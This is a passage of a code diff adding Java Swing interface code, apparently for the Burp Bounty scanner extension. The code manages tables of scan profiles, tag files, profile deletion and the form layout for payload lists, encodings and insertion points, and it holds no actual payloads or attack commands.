+ model.setNumRows(0);
+ model.setColumnCount(0);
+ model.addColumn("Profile");
+ model.addColumn("Enabled");
+ model.addColumn("Authors Twitter");
+
+ table.getColumnModel().getColumn(0).setPreferredWidth(400);
+ table.getColumnModel().getColumn(1).setPreferredWidth(5);
+ table.getColumnModel().getColumn(2).setPreferredWidth(70);
+ TableRowSorter sorter = new TableRowSorter<>(table.getModel());
+ table.setRowSorter(sorter);
+ List sortKeys = new ArrayList<>();
+
+ sortKeys.add(new RowSorter.SortKey(0, SortOrder.ASCENDING));
+ sorter.setSortKeys(sortKeys);
+ sorter.sort();
+
+ //model for passive response
+ model1.setNumRows(0);
+ model1.setColumnCount(0);
+ model1.addColumn("Profile");
+ model1.addColumn("Enabled");
+ model1.addColumn("Authors Twitter");
+
+ table1.getColumnModel().getColumn(0).setPreferredWidth(400);
+ table1.getColumnModel().getColumn(1).setPreferredWidth(5);
+ table1.getColumnModel().getColumn(2).setPreferredWidth(70);
+ TableRowSorter sorter1 = new TableRowSorter<>(table1.getModel());
+ table1.setRowSorter(sorter1);
+ List sortKeys1 = new ArrayList<>();
+
+ sortKeys1.add(new RowSorter.SortKey(0, SortOrder.ASCENDING));
+ sorter1.setSortKeys(sortKeys1);
+ sorter1.sort();
+
+ //model for passive request
+ model2.setNumRows(0);
+ model2.setColumnCount(0);
+ model2.addColumn("Profile");
+ model2.addColumn("Enabled");
+ model2.addColumn("Authors Twitter");
+
+ table2.getColumnModel().getColumn(0).setPreferredWidth(400);
+ table2.getColumnModel().getColumn(1).setPreferredWidth(5);
+ table2.getColumnModel().getColumn(2).setPreferredWidth(70);
+ TableRowSorter sorter2 = new TableRowSorter<>(table2.getModel());
+ table2.setRowSorter(sorter2);
+ List sortKeys2 = new ArrayList<>();
+
+ sortKeys2.add(new RowSorter.SortKey(0, SortOrder.ASCENDING));
+ sorter2.setSortKeys(sortKeys2);
+ sorter2.sort();
+
+ String author = "";
+
+ if (json != null) {
+ for (JsonElement pa : json) {
+ JsonObject bbObj = pa.getAsJsonObject();
+ if (bbObj.has("Author")) {
+ author = bbObj.get("Author").getAsString();
+ }
+ JsonArray Tags = new JsonArray();
+ if (bbObj.has("Tags")) {
+ Tags = bbObj.get("Tags").getAsJsonArray();
+ if (!Tags.toString().contains("All")) {
+ Tags.add("All");
+ }
+ } else {
+ Tags.add("All");
+ }
+ for (JsonElement t : Tags) {
+ if (t.getAsString().equals(Tag)) {
+ if (bbObj.get("Scanner").getAsInt() == 1) {
+ if (bbObj.get("Active").getAsBoolean()) {
+ model.addRow(new Object[]{bbObj.get("Name").getAsString(), "Yes", author});
+ } else {
+ model.addRow(new Object[]{bbObj.get("Name").getAsString(), "No", author});
+ }
+ author = "";
+ } else if (bbObj.get("Scanner").getAsInt() == 2) {
+ if (bbObj.get("Active").getAsBoolean()) {
+ model1.addRow(new Object[]{bbObj.get("Name").getAsString(), "Yes", author});
+ } else {
+ model1.addRow(new Object[]{bbObj.get("Name").getAsString(), "No", author});
+ }
+ author = "";
+ } else if (bbObj.get("Scanner").getAsInt() == 3) {
+ if (bbObj.get("Active").getAsBoolean()) {
+ model2.addRow(new Object[]{bbObj.get("Name").getAsString(), "Yes", author});
+ } else {
+ model2.addRow(new Object[]{bbObj.get("Name").getAsString(), "No", author});
+ }
+ author = "";
+
+ }
+ }
+ }
+ }
+ }
+ }
+
+ public void showHeaders(List Header) {
+ //model for active profiles
+ model4.setNumRows(0);
+ model4.setColumnCount(0);
+ model4.addColumn("Item");
+ model4.addColumn("Match");
+ model4.addColumn("Replace");
+ model4.addColumn("Type");
+ model4.addColumn("Comment");
+
+ table4.getColumnModel().getColumn(0).setPreferredWidth(140);
+ table4.getColumnModel().getColumn(1).setPreferredWidth(400);
+ table4.getColumnModel().getColumn(2).setPreferredWidth(450);
+ table4.getColumnModel().getColumn(3).setPreferredWidth(120);
+ table4.getColumnModel().getColumn(4).setPreferredWidth(250);
+ JComboBox jcb = new JComboBox();
+ jcb.addItem("Payload");
+ jcb.addItem("Request");
+ JComboBox jcb1 = new JComboBox();
+ jcb1.addItem("String");
+ jcb1.addItem("Regex");
+ table4.getColumnModel().getColumn(0).setCellEditor(new DefaultCellEditor(jcb));
+ table4.getColumnModel().getColumn(3).setCellEditor(new DefaultCellEditor(jcb1));
+ TableRowSorter sorter = new TableRowSorter<>(table4.getModel());
+ table4.setRowSorter(sorter);
+ List sortKeys = new ArrayList<>();
+
+ sortKeys.add(new RowSorter.SortKey(0, SortOrder.DESCENDING));
+ sorter.setSortKeys(sortKeys);
+ sorter.sort();
+
+ for (int i = 0; i < Header.size(); i++) {
+ model4.addRow(new Object[]{Header.get(i).type, Header.get(i).match, Header.get(i).replace, Header.get(i).regex, Header.get(i).comment});
+ }
+ }
+
+ public void deleteProfile(int tableIndex) {
+
+ Gson gson = new Gson();
+ File f = new File(filename);
+
+ File[] files = f.listFiles(new FilenameFilter() {
+ @Override
+ public boolean accept(File dir, String name) {
+ if (name.toLowerCase().endsWith(".bb")) {
+ return true;
+ } else {
+ return false;
+ }
+ }
+ });
+
+ JTable finalTable = new JTable();
+
+ if (tableIndex == 0) {
+ finalTable = table;
+ } else if (tableIndex == 1) {
+ finalTable = table1;
+ } else if (tableIndex == 2) {
+ finalTable = table2;
+ }
+
+ int[] rows = finalTable.getSelectedRows();
+ if (f.exists() && f.isDirectory()) {
+ for (File file : files) {
+ for (Integer row : rows) {
+ try {
+ JsonArray data = new JsonArray();
+ JsonReader json = new JsonReader(new FileReader(file.getAbsolutePath()));
+ JsonParser parser = new JsonParser();
+ data.addAll(parser.parse(json).getAsJsonArray());
+
+ Object idata = data.get(0);
+ Issue i = gson.fromJson(idata.toString(), Issue.class);
+ String pname = finalTable.getValueAt(row, 0).toString();
+
+ if (pname.equals(i.getName())) {
+ file.delete();
+ }
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ }
+ }
+ }
+ showProfiles("All");
+ }
+
+ public String getFilename() {
+
+ return filename;
+ }
+
+ public void swap(int a, int b) {
+ Object aObject = encoder.getElementAt(a);
+ Object bObject = encoder.getElementAt(b);
+ encoder.set(a, bObject);
+ encoder.set(b, aObject);
+ }
+
+ public void addNewTag(String str) {
+ if(!str.isEmpty()){
+ try {
+ BufferedWriter out = new BufferedWriter(new FileWriter(filename + "tags.txt", true));
+ out.write(str + "\n");
+ out.close();
+ } catch (IOException e) {
+ System.out.println("exception occoured" + e);
+ }
+ }
+ }
+
+ public void removeTag(String tag) {
+ String file = filename + "tags.txt";
+ try {
+
+ File inFile = new File(file);
+
+ if (!inFile.isFile()) {
+ System.out.println("Parameter is not an existing file");
+ return;
+ }
+
+ //Construct the new file that will later be renamed to the original filename.
+ File tempFile = new File(inFile.getAbsolutePath() + ".tmp");
+
+ BufferedReader br = new BufferedReader(new FileReader(file));
+ PrintWriter pw = new PrintWriter(new FileWriter(tempFile));
+
+ String line = null;
+
+ //Read from the original file and write to the new
+ //unless content matches data to be removed.
+ while ((line = br.readLine()) != null) {
+
+ if (!line.trim().equals(tag)) {
+ pw.println(line);
+ pw.flush();
+ }
+ }
+ pw.close();
+ br.close();
+
+ //Delete the original file
+ if (!inFile.delete()) {
+ System.out.println("Could not delete file");
+ return;
+ }
+
+ //Rename the new file to the filename the original file had.
+ if (!tempFile.renameTo(inFile)) {
+ System.out.println("Could not rename file");
+ }
+
+ } catch (FileNotFoundException ex) {
+ ex.printStackTrace();
+ } catch (IOException ex) {
+ ex.printStackTrace();
+ }
+ }
+
+ public void showTags() {
+ File file = new File(filename + "tags.txt");
+ if (!file.exists()) {
+ try {
+ file.createNewFile();
+ } catch (IOException ex) {
+ Logger.getLogger(BurpBountyGui.class.getName()).log(Level.SEVERE, null, ex);
+ }
+ }
+ List tags = readFile(filename + "tags.txt");
+ newTagCombo.removeAllItems();
+ newTagCombo2.removeAllItems();
+ tagmanager.removeAllElements();
+ newTagCombo2.addItem("All");
+ for (String tag : tags) {
+ newTagCombo.addItem(tag);
+ newTagCombo2.addItem(tag);
+ tagmanager.addElement(tag);
+ }
+ }
+
+ /**
+ * This method is called from within the constructor to initialize the form.
+ * WARNING: Do NOT modify this code. The content of this method is always
+ * regenerated by the Form Editor.
+ */
+ @SuppressWarnings("unchecked")
+ // //GEN-BEGIN:initComponents
+ private void initComponents() {
+
+ buttonGroup1 = new javax.swing.ButtonGroup();
+ buttonGroup2 = new javax.swing.ButtonGroup();
+ buttonGroup3 = new javax.swing.ButtonGroup();
+ buttonGroup4 = new javax.swing.ButtonGroup();
+ buttonGroup5 = new javax.swing.ButtonGroup();
+ buttonGroup6 = new javax.swing.ButtonGroup();
+ buttonGroup7 = new javax.swing.ButtonGroup();
+ buttonGroup8 = new javax.swing.ButtonGroup();
+ buttonGroup9 = new javax.swing.ButtonGroup();
+ jCheckBoxMenuItem1 = new javax.swing.JCheckBoxMenuItem();
+ jMenuItem1 = new javax.swing.JMenuItem();
+ jButton5 = new javax.swing.JButton();
+ text11 = new javax.swing.JTextField();
+ jButton1 = new javax.swing.JButton();
+ jTabbedPane2 = new javax.swing.JTabbedPane();
+ jPanel1 = new javax.swing.JPanel();
+ jLabel1 = new javax.swing.JLabel();
+ combo1 = new javax.swing.JComboBox<>();
+ jButton2 = new javax.swing.JButton();
+ jButton3 = new javax.swing.JButton();
+ text1 = new javax.swing.JTextField();
+ jLabel18 = new javax.swing.JLabel();
+ jLabel12 = new javax.swing.JLabel();
+ textauthor = new javax.swing.JTextField();
+ jLabel8 = new javax.swing.JLabel();
+ radio2 = new javax.swing.JRadioButton();
+ radioPR = new javax.swing.JRadioButton();
+ radio1 = new javax.swing.JRadioButton();
+ headerstab = new javax.swing.JTabbedPane();
+ jPanel10 = new javax.swing.JPanel();
+ jLabel5 = new javax.swing.JLabel();
+ jScrollPane3 = new javax.swing.JScrollPane();
+ list1 = new javax.swing.JList<>();
+ button2 = new javax.swing.JButton();
+ textpayloads = new javax.swing.JTextField();
+ button3 = new javax.swing.JButton();
+ button4 = new javax.swing.JButton();
+ button5 = new javax.swing.JButton();
+ button6 = new javax.swing.JButton();
+ textfield1 = new javax.swing.JTextField();
+ jLabel19 = new javax.swing.JLabel();
+ append = new javax.swing.JRadioButton();
+ replace = new javax.swing.JRadioButton();
+ jLabel10 = new javax.swing.JLabel();
+ check8 = new javax.swing.JCheckBox();
+ text5 = new javax.swing.JTextField();
+ jScrollPane4 = new javax.swing.JScrollPane();
+ list3 = new javax.swing.JList<>();
+ jButton9 = new javax.swing.JButton();
+ jButton8 = new javax.swing.JButton();
+ jButton7 = new javax.swing.JButton();
+ jButton6 = new javax.swing.JButton();
+ combo2 = new javax.swing.JComboBox<>();
+ jSeparator2 = new javax.swing.JSeparator();
+ jLabel22 = new javax.swing.JLabel();
+ jLabel23 = new javax.swing.JLabel();
+ jLabel52 = new javax.swing.JLabel();
+ jLabel53 = new javax.swing.JLabel();
+ button18 = new javax.swing.JButton();
+ jScrollPane14 = new javax.swing.JScrollPane();
+ table4 = new javax.swing.JTable();
+ button19 = new javax.swing.JButton();
+ jSeparator3 = new javax.swing.JSeparator();
+ jSeparator4 = new javax.swing.JSeparator();
+ jLabel54 = new javax.swing.JLabel();
+ jLabel55 = new javax.swing.JLabel();
+ jLabel11 = new javax.swing.JLabel();
+ extensionprovided = new javax.swing.JCheckBox();
+ header = new javax.swing.JCheckBox();
+ paramamf = new javax.swing.JCheckBox();
+ parambody = new javax.swing.JCheckBox();
+ paramcookie = new javax.swing.JCheckBox();
+ paramjson = new javax.swing.JCheckBox();
+ parammultipartattr = new javax.swing.JCheckBox();
+ paramnamebody = new javax.swing.JCheckBox();
+ paramnameurl = new javax.swing.JCheckBox();
+ paramurl = new javax.swing.JCheckBox();
+ paramxml = new javax.swing.JCheckBox();
+ paramxmlattr = new javax.swing.JCheckBox();
+ urlpathfilename = new javax.swing.JCheckBox();
+ entirebody = new javax.swing.JCheckBox();
+ urlpathfolder = new javax.swing.JCheckBox();
+ userprovided = new javax.swing.JCheckBox();
+ unknown = new javax.swing.JCheckBox();
+ All = new javax.swing.JCheckBox();
+ jLabel17 = new javax.swing.JLabel();
+ jPanel11 = new javax.swing.JPanel();
+ button8 = new javax.swing.JButton();
+ button9 = new javax.swing.JButton();
+ button10 = new javax.swing.JButton();
+ textgreps = new javax.swing.JTextField();
+ button11 = new javax.swing.JButton();
+ textfield2 = new javax.swing.JTextField();
+ jScrollPane2 = new javax.swing.JScrollPane();
+ list2 = new javax.swing.JList<>();
+ button7 = new javax.swing.JButton();
+ radio12 = new javax.swing.JRadioButton();
+ radio4 = new javax.swing.JRadioButton();
+ radio3 = new javax.swing.JRadioButton();
+ radio22 = new javax.swing.JRadioButton();
+ check4 = new javax.swing.JCheckBox();
+ check1 = new javax.swing.JCheckBox();
+ excludehttp = new javax.swing.JCheckBox();
+ onlyhttp = new javax.swing.JCheckBox();
+ check71 = new javax.swing.JCheckBox();
+ check72 = new javax.swing.JCheckBox();
+ texttime = new javax.swing.JTextField();
+ text72 = new javax.swing.JTextField();
+ text71 = new javax.swing.JTextField();
+ negativeCT = new javax.swing.JCheckBox();
+ negativeRC = new javax.swing.JCheckBox();
+ jLabel16 = new javax.swing.JLabel();
+ jLabel24 = new javax.swing.JLabel();
+ jLabel25 = new javax.swing.JLabel();
+ jLabel26 = new javax.swing.JLabel();
+ jLabel27 = new javax.swing.JLabel();
+ jLabel28 = new javax.swing.JLabel();
+ jLabel29 = new javax.swing.JLabel();
+ jSeparator5 = new javax.swing.JSeparator();
+ jLabel30 = new javax.swing.JLabel();
+ jLabel31 = new javax.swing.JLabel();
+ jSeparator6 = new javax.swing.JSeparator();
+ rb1 = new javax.swing.JRadioButton();
+ rb2 = new javax.swing.JRadioButton();
+ rb3 = new javax.swing.JRadioButton();
+ rb4 = new javax.swing.JRadioButton();
+ jLabel2 = new javax.swing.JLabel();
+ sp1 = new javax.swing.JSpinner();
+ radiotime = new javax.swing.JRadioButton();
+ jLabel6 = new javax.swing.JLabel();
+ jSeparator11 = new javax.swing.JSeparator();
+ jLabel42 = new javax.swing.JLabel();
+ radiocl = new javax.swing.JRadioButton();
+ textcl = new javax.swing.JTextField();
+ variationsRadio = new javax.swing.JRadioButton();
+ invariationsRadio = new javax.swing.JRadioButton();
+ Attributes = new javax.swing.JPanel();
+ status_code = new javax.swing.JCheckBox();
+ input_image_labels = new javax.swing.JCheckBox();
+ non_hidden_form_input_types = new javax.swing.JCheckBox();
+ page_title = new javax.swing.JCheckBox();
+ visible_text = new javax.swing.JCheckBox();
+ button_submit_labels = new javax.swing.JCheckBox();
+ div_ids = new javax.swing.JCheckBox();
+ word_count = new javax.swing.JCheckBox();
+ content_type = new javax.swing.JCheckBox();
+ outbound_edge_tag_names = new javax.swing.JCheckBox();
+ location = new javax.swing.JCheckBox();
+ css_classes = new javax.swing.JCheckBox();
+ last_modified_header = new javax.swing.JCheckBox();
+ set_cookie_names = new javax.swing.JCheckBox();
+ line_count = new javax.swing.JCheckBox();
+ comments = new javax.swing.JCheckBox();
+ tag_ids = new javax.swing.JCheckBox();
+ header_tags = new javax.swing.JCheckBox();
+ content_length = new javax.swing.JCheckBox();
+ visible_word_count = new javax.swing.JCheckBox();
+ whole_body_content = new javax.swing.JCheckBox();
+ etag_header = new javax.swing.JCheckBox();
+ first_header_tag = new javax.swing.JCheckBox();
+ tag_names = new javax.swing.JCheckBox();
+ input_submit_labels = new javax.swing.JCheckBox();
+ outbound_edge_count = new javax.swing.JCheckBox();
+ content_location = new javax.swing.JCheckBox();
+ initial_body_content = new javax.swing.JCheckBox();
+ limited_body_content = new javax.swing.JCheckBox();
+ canonical_link = new javax.swing.JCheckBox();
+ anchor_labels = new javax.swing.JCheckBox();
+ jSeparator12 = new javax.swing.JSeparator();
+ jPanel12 = new javax.swing.JPanel();
+ jLabel32 = new javax.swing.JLabel();
+ jLabel33 = new javax.swing.JLabel();
+ jLabel3 = new javax.swing.JLabel();
+ jLabel4 = new javax.swing.JLabel();
+ radio5 = new javax.swing.JRadioButton();
+ radio6 = new javax.swing.JRadioButton();
+ radio7 = new javax.swing.JRadioButton();
+ radio8 = new javax.swing.JRadioButton();
+ jLabel7 = new javax.swing.JLabel();
+ radio9 = new javax.swing.JRadioButton();
+ radio10 = new javax.swing.JRadioButton();
+ radio11 = new javax.swing.JRadioButton();
+ text4 = new javax.swing.JTextField();
+ jSeparator7 = new javax.swing.JSeparator();
+ jLabel34 = new javax.swing.JLabel();
+ jLabel35 = new javax.swing.JLabel();
+ jScrollPane7 = new javax.swing.JScrollPane();
+ textarea2 = new javax.swing.JTextArea();
+ jLabel13 = new javax.swing.JLabel();
+ jLabel36 = new javax.swing.JLabel();
+ jLabel37 = new javax.swing.JLabel();
+ jSeparator8 = new javax.swing.JSeparator();
+ jLabel38 = new javax.swing.JLabel();
+ jLabel39 = new javax.swing.JLabel();
+ jSeparator9 = new javax.swing.JSeparator();
+ jScrollPane1 = new javax.swing.JScrollPane();
+ textarea1 = new javax.swing.JTextArea();
+ jLabel9 = new javax.swing.JLabel();
+ jScrollPane8 = new javax.swing.JScrollPane();
+ textarea3 = new javax.swing.JTextArea();
+ jLabel14 = new javax.swing.JLabel();
+ jLabel40 = new javax.swing.JLabel();
+ jLabel41 = new javax.swing.JLabel();
+ jSeparator10 = new javax.swing.JSeparator();
+ jScrollPane9 = new javax.swing.JScrollPane();
+ textarea4 = new javax.swing.JTextArea();
+ jLabel15 = new javax.swing.JLabel();
+ jPanel3 = new javax.swing.JPanel();
+ removetag = new javax.swing.JButton();
+ addTag = new javax.swing.JButton();
+ newTagCombo = new javax.swing.JComboBox<>();
+ jScrollPane11 = new javax.swing.JScrollPane();
+ listtag = new javax.swing.JList<>();
+ jLabel46 = new javax.swing.JLabel();
+ jLabel47 = new javax.swing.JLabel();
+ newTagb = new javax.swing.JButton();
+ jPanel2 = new javax.swing.JPanel();
+ jLabel43 = new javax.swing.JLabel();
+ jLabel44 = new javax.swing.JLabel();
+ jLabel45 = new javax.swing.JLabel();
+ newTagCombo2 = new javax.swing.JComboBox<>();
+ jtabpane = new javax.swing.JTabbedPane();
+ jScrollPane5 = new javax.swing.JScrollPane();
+ table = new javax.swing.JTable();
+ jScrollPane6 = new javax.swing.JScrollPane();
+ table1 = new javax.swing.JTable();
+ jScrollPane10 = new javax.swing.JScrollPane();
+ table2 = new javax.swing.JTable();
+ button1 = new javax.swing.JButton();
+ button12 = new javax.swing.JButton();
+ button13 = new javax.swing.JButton();
+ jButton4 = new javax.swing.JButton();
+ jButton10 = new javax.swing.JButton();
+ jPanel4 = new javax.swing.JPanel();
+ jLabel48 = new javax.swing.JLabel();
+ jLabel49 = new javax.swing.JLabel();
+ jButton11 = new javax.swing.JButton();
+ jButton12 = new javax.swing.JButton();
+ jButton13 = new javax.swing.JButton();
+ jScrollPane13 = new javax.swing.JScrollPane();
+ listtagmanager = new javax.swing.JList<>();
+
+ jCheckBoxMenuItem1.setSelected(true);
+ jCheckBoxMenuItem1.setText("jCheckBoxMenuItem1");
+
+ jMenuItem1.setText("jMenuItem1");
+
+ setAutoscrolls(true);
+
+ jButton5.setText("Profiles Directory");
+ jButton5.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ loadConfigFile(evt);
+ }
+ });
+
+ text11.setToolTipText("");
+
+ jButton1.setText("Profiles Reload");
+ jButton1.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ profilesReload(evt);
+ }
+ });
+
+ jTabbedPane2.addChangeListener(new javax.swing.event.ChangeListener() {
+ public void stateChanged(javax.swing.event.ChangeEvent evt) {
+ showprofiles(evt);
+ }
+ });
+
+ jLabel1.setFont(new java.awt.Font("Lucida Grande", 1, 15)); // NOI18N
+ jLabel1.setText("Select Profile:");
+
+ combo1.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+ combo1.setModel(new javax.swing.DefaultComboBoxModel<>());
+ combo1.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ selectAttack(evt);
+ }
+ });
+
+ jButton2.setText("Save");
+ jButton2.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ saveAttack(evt);
+ }
+ });
+
+ jButton3.setText("New Profile");
+ jButton3.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ jButton3ActionPerformed(evt);
+ }
+ });
+
+ text1.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+
+ jLabel18.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+ jLabel18.setText("Author:");
+
+ jLabel12.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+ jLabel12.setText("Name:");
+
+ textauthor.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+
+ jLabel8.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+ jLabel8.setText("Scanner:");
+
+ buttonGroup1.add(radio2);
+ radio2.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+ radio2.setText("Passive Response");
+ radio2.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ SelectPassiveResponse(evt);
+ }
+ });
+
+ buttonGroup1.add(radioPR);
+ radioPR.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+ radioPR.setText("Passive Request");
+ radioPR.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ selectPassiveRequest(evt);
+ }
+ });
+
+ buttonGroup1.add(radio1);
+ radio1.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+ radio1.setText("Active");
+ radio1.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ selectActive(evt);
+ }
+ });
+
+ headerstab.setAutoscrolls(true);
+ headerstab.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+ headerstab.addChangeListener(new javax.swing.event.ChangeListener() {
+ public void stateChanged(javax.swing.event.ChangeEvent evt) {
+ headerstabStateChanged(evt);
+ }
+ });
+
+ jPanel10.setAutoscrolls(true);
+ jPanel10.setMaximumSize(new java.awt.Dimension(800, 800));
+ jPanel10.setPreferredSize(new java.awt.Dimension(716, 800));
+
+ jLabel5.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel5.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel5.setText("Payload Sets");
+
+ list1.setModel(payload);
+ jScrollPane3.setViewportView(list1);
+
+ button2.setText("Paste");
+ button2.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ pastePayload(evt);
+ }
+ });
+
+ textpayloads.setToolTipText("");
+
+ button3.setText("Load File");
+ button3.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ loadPayloads(evt);
+ }
+ });
+
+ button4.setText("Remove");
+ button4.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ removePayload(evt);
+ }
+ });
+
+ button5.setText("Clear");
+ button5.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ removeAllPayloads(evt);
+ }
+ });
+
+ button6.setText("Add");
+ button6.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ setToPayload(evt);
+ }
+ });
+
+ jLabel19.setText("You can define one or more payloads. Each payload of this section will be sent at each insertion point.");
+
+ buttonGroup9.add(append);
+ append.setText("Append");
+
+ buttonGroup9.add(replace);
+ replace.setText("Replace");
+
+ jLabel10.setText("Payload position:");
+
+ check8.setText("URL-Encode these characters:");
+
+ list3.setModel(encoder);
+ jScrollPane4.setViewportView(list3);
+
+ jButton9.setText("Remove");
+ jButton9.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ jButton9removeEncoder(evt);
+ }
+ });
+
+ jButton8.setText("Up");
+ jButton8.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ jButton8upEncoder(evt);
+ }
+ });
+
+ jButton7.setText("Down");
+ jButton7.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ jButton7downEncoder(evt);
+ }
+ });
+
+ jButton6.setText("Add");
+ jButton6.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ jButton6addEncoder(evt);
+ }
+ });
+
+ combo2.setModel(new javax.swing.DefaultComboBoxModel<>(new String[] { "URL-encode key characters", "URL-encode all characters", "URL-encode all characters (Unicode)", "HTML-encode key characters", "HTML-encode all characters", "Base64-encode" }));
+
+ jLabel22.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel22.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel22.setText("Payload Encoding");
+
+ jLabel23.setText("You can define the encoding of payloads. You can encode each payload multiple times.");
+
+ jLabel52.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel52.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel52.setText("Match and Replace");
+
+ jLabel53.setText("These settings are used to automatically replace part of request when the active scanner run.");
+
+ button18.setText("Remove");
+ button18.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ removeMatchReplace(evt);
+ }
+ });
+
+ table4.setFont(new java.awt.Font("Lucida Grande", 0, 13)); // NOI18N
+ table4.setModel(model4);
+ table4.setShowGrid(false);
+ jScrollPane14.setViewportView(table4);
+
+ button19.setText("Add");
+ button19.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ addMatchReplace(evt);
+ }
+ });
+
+ jLabel54.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel54.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel54.setText("Payload Options");
+
+ jLabel55.setText("You can define the payload options.");
+
+ jLabel11.setText("Insertion point type:");
+
+ extensionprovided.setText("Path discovery");
+
+ header.setText("Header");
+
+ paramamf.setText("Param AMF");
+
+ parambody.setText("Param body");
+
+ paramcookie.setText("Param cookie");
+
+ paramjson.setText("Param json");
+
+ parammultipartattr.setText("Param multipart attr");
+
+ paramnamebody.setText("Param name body");
+
+ paramnameurl.setText("Param name url");
+
+ paramurl.setText("Param url");
+
+ paramxml.setText("Param xml");
+ paramxml.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ paramxmlActionPerformed(evt);
+ }
+ });
+
+ paramxmlattr.setText("Param xml attr");
+
+ urlpathfilename.setText("Url path filename");
+
+ entirebody.setText("Entire body");
+
+ urlpathfolder.setText("Url path folder");
+
+ userprovided.setText("User provided");
+
+ unknown.setText("Unknown");
+
+ All.setText("All ");
+ All.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ AllItemStateChanged(evt);
+ }
+ });
+
+ jLabel17.setText(" * More info at Burp Suite Extender API");
+ jLabel17.addMouseListener(new java.awt.event.MouseAdapter() {
+ public void mouseClicked(java.awt.event.MouseEvent evt) {
+ goWeb(evt);
+ }
+ });
+
+ javax.swing.GroupLayout jPanel10Layout = new javax.swing.GroupLayout(jPanel10);
+ jPanel10.setLayout(jPanel10Layout);
+ jPanel10Layout.setHorizontalGroup(
+ jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jSeparator2)
+ .addComponent(jSeparator3)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel10Layout.createSequentialGroup()
+ .addGap(12, 12, 12)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(button3, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(button4, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addComponent(button5, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE)))
+ .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, jPanel10Layout.createSequentialGroup()
+ .addContainerGap()
+ .addComponent(button2, javax.swing.GroupLayout.PREFERRED_SIZE, 89, javax.swing.GroupLayout.PREFERRED_SIZE)))
+ .addGap(18, 18, 18)
+ .addGroup(jPanel10Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
+ .addComponent(textpayloads)
